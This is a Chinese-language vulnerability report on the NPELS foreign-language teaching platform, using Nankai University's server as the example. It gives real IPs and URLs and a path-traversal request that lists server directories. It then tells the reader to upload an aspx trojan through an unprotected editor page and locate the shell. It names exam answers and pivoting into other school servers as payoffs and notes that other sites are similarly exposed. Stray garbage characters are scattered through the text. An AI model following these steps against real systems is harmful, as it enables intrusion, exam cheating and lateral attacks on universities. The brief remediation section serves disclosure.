新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

( x/ S, D: p  l详细说明：

3 D$ x' b  F4 H- P7 w( n以南开大学的为例:
; E( Q, ]* q2 ~http://222.30.60.3/NPELS
: s- A& _0 c/ R! u$ e4 |- }NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 N1 \0 E- ?, o% C<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
# O3 }0 r5 n* e% i# v+ `</setting>
及版本号
# {1 _- A2 V& W6 N! m# f! ~: L<add key="TVersion" value="1, 0, 0, 2187">
</add>
0 n1 V) d$ \+ J* I3 F; K) I- i, g直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
: c% l* ?( A4 B" c& L3 I7 [7 p; h进一步列目录（返回的网页很大，可以直接 wget 下来）
7 i- {& M3 |( d, [7 vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
$ x2 W- W  ?& @1 O& {" Xhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
: F7 Y& [* q' X0 y3 F9 f; }9 i9 u可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

+ f$ p5 B0 `5 `/ N, o! B% _4 vOOXX
2 i+ x3 X7 D) F% E- T$ l' I
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
6 H; C: [" }; V0 P漏洞证明：
9 s! o& q) J+ x( K4 z4 _# i
& X; _4 V# O! U% j. G列目录：
. S3 v$ L8 w0 Ihttp://222.30.60.3/NPELS/CommonS ... List?version=../../
% V+ S0 [) n# P) `文件上传：
4 K! q& m8 c9 X" B3 d  }! Nhttp://222.30.60.3/npelsv/editor/editor.htm

- K3 F+ I" T/ e) X' C+ V: H$ s7 t上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
! o) W+ J, b- `+ I+ }
修复方案：
好像考试系统必须使用 CommonService.asmx
4 G6 H6 S& v: J: o最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
# T9 T8 T: Y: F; B% d